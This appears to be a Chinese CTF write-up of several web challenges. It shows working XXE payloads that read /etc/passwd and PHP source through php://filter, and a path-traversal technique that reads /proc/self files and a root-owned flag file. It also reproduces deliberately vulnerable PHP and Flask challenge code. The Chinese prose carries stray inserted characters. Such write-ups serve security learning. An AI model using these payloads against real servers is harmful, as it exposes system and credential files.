0x01 Game

這題迷得很悬嗓，查看下一下js丈攒，按著ajax發(fā)送請求得條件自己發(fā)一個請求就好了

payload:

/socre.php
POST:score=15

0x02 who_are_you

XXE的題目，沒有任何限制墓捻，直接任意文件讀取......

<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY> 
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>

可以讀到passwd的信息谜叹，所以主要就是找到flag就好了，最后是在index.php里找到了flag括堤，由于php文件里有<等特殊字符碌秸，所以利用file協(xié)議讀的時候會出現(xiàn)解析錯誤導(dǎo)致沒有回顯，所以換一個編碼的協(xié)議讀就好了比如php://filter

<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ELEMENT name ANY> 
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >]>
<root>
<name>&xxe;</name>
</root>

index.php源碼

<?php
libxml_disable_entity_loader(false);
$data = @file_get_contents('php://input');
$resp = '';
//$flag='flag{1900cb98-96c4-45ac-a22e-86da06d59a3e}';
if($data != false){
    $dom = new DOMDocument();
    $dom->loadXML($data, LIBXML_NOENT);
    ob_start();
    $res  = $dom->textContent;
    $resp = ob_get_contents();
    ob_end_clean();
    if ($res){
        die($res);
    }

}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>welcome</title>
    <link rel="stylesheet" href="./style.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">

</head>
<body class="contactBody">
<div class="wrapper">
    <div class="title">


    </div>


    <form method="post" class="form">
        <h1 id="title">請輸入姓名</h1>
        <br/>
        <br/>
        <br/>
        <input type="text" class="name entry " id="name" name="name" placeholder="Your Name"/>
    </form>
    <button class="submit entry" onclick="func()">Submit</button>

    <div class="shadow"></div>
</div>

</body>
</html>
<script type="text/javascript">
    function play() {
        return false;
    }
    function func() {
        // document.getElementById().value
        var xml = '' +
            '<\?xml version="1.0" encoding="UTF-8"\?>' +
            '<feedback>' +
            '<author>' + document.getElementById('name').value+ '</author>' +
            '</feedback>';
        console.log(xml);
        var xmlhttp = new XMLHttpRequest();
        xmlhttp.onreadystatechange = function () {
            if (xmlhttp.readyState == 4) {
                // console.log(xmlhttp.readyState);
                // console.log(xmlhttp.responseText);
                var res = xmlhttp.responseText;
                document.getElementById('title').textContent = res
            }
        };
        xmlhttp.open("POST", "index.php", true);
        xmlhttp.send(xml);
        return false;
    };
</script>
</body>
</html>

0x03 show_me_your_image

主要思路就是上傳文件悄窃，上傳文件后讥电。文件名會被編碼，多測幾次就可以發(fā)現(xiàn)是一個變表的base64編碼轧抗，base64編碼是固定3個字符編碼為固定的4個字符恩敌，題目的還有一個點(diǎn)就是任意文件讀取，name參數(shù)后跟任意文件的變表編碼的值横媚，所以根據(jù)上傳的文件名進(jìn)獲取對應(yīng)的編碼潮剪，所以上傳的文件名需要構(gòu)造，文件名的長度需要是3的倍數(shù)才能確定最后的文件名分唾，并且隨便輸入的報錯信息不是apache+php的抗碰，最后才確定是一個Flask模擬的php，騙人用的~~~

所以現(xiàn)在講下具體操作步驟：
(1) 設(shè)置要讀的文件（比如要讀的是passwd文件）,設(shè)置上傳的文件名為'../.././/etc/passwd'（測試可以發(fā)現(xiàn)是2層目錄绽乔，長度要是3的倍數(shù)）
(2)分段進(jìn)行上傳弧蝇，收集各段的編碼后的字符進(jìn)行拼接，比如axb8axb8axnVSml8jmNBjUS9
(3)訪問img.php?name=[文件編碼后的編碼]就可以讀取到相應(yīng)的文件

所以接下來就是找flag的路徑折砸，由于我們不知道各個文件的路徑看疗，所以用/proc/self/來僅需讀取

../../././proc/self/cmdline   #可以讀到當(dāng)前服務(wù)為app.py
#python3 app.py sleep 36000

../..//proc/self/cwd/app.py  #可以讀到本題的源碼
#####################################
import os
from urllib import parse
from base64 import b64decode, b64encode
from utils import r_encode, r_decode, read_file
from flask import render_template, Response
from flask import Flask, session, redirect, request
from werkzeug.utils import secure_filename

app = Flask(__name__)

app.config['SECRET_KEY'] = os.urandom(24)

UPLOAD_FOLDER = '/tmp/uploads/'

ALLOWED_EXTENSIONS = {'png', 'jpg', 'jpeg', 'gif'}
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER


def allowed_file(filename):
    return '.' in filename and \
           filename.rsplit('.', 1)[1] in ALLOWED_EXTENSIONS


@app.route('/')
@app.route('/index.php')
def home():
    file = session.get('file')
    if file:
        file = bytes.decode(file)
        file = parse.quote(file)
    return render_template('index.html', file=file)


@app.route('/upload.php', methods=['POST'])
def upload():
    if request.method == 'POST':
        file = request.files['file']
        if file and allowed_file(file.filename):
            if not os.path.exists(app.config['UPLOAD_FOLDER']):
                os.makedirs(app.config['UPLOAD_FOLDER'])
            filename = secure_filename(file.filename)
            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))
        else:
            return "不允許的格式"
    session['file'] = r_encode(b64encode(str.encode(file.filename)))
    return redirect('/')


@app.route('/img.php', methods=['GET'])
def img():
    file = request.args.get("name")
    file = r_decode(str.encode(file))
    file = b64decode(file)
    file = UPLOAD_FOLDER + bytes.decode(file)
    image = read_file(file)
    return Response(image, mimetype="image/jpeg")


if __name__ == '__main__':
    app.run(
        host = '0.0.0.0',
        port = 80,
     )

../../././proc/self/cwd/templates/upload.html  
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Title</title>
</head>
<body>
<form action="upload.php" method="post" enctype="multipart/form-data">
    <table>
        <tr>
            <td>
                上傳圖片
            </td>
            <td>
                <input type="file" name="file">

            </td>
        </tr>
    </table>
    <input type="submit" value="上傳">
</form>
{% if file %}
    <img src="img.php?name={{ file }}">
{% else %}
    請上傳一張圖片
{% endif %}
</body>
</html>
<!-- flag in /root/flag.txt ! Get it ! -->

所以flag在/root/flag.txt下了最后利用

../.././proc/self/root/root/flag.txt     #讀flag

0x04 按F注入

fbctf2019題目的修改題，目前只做到了回顯數(shù)據(jù)庫信息睦授，還沒讀到flag两芳，等復(fù)現(xiàn)完再寫
參考：https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md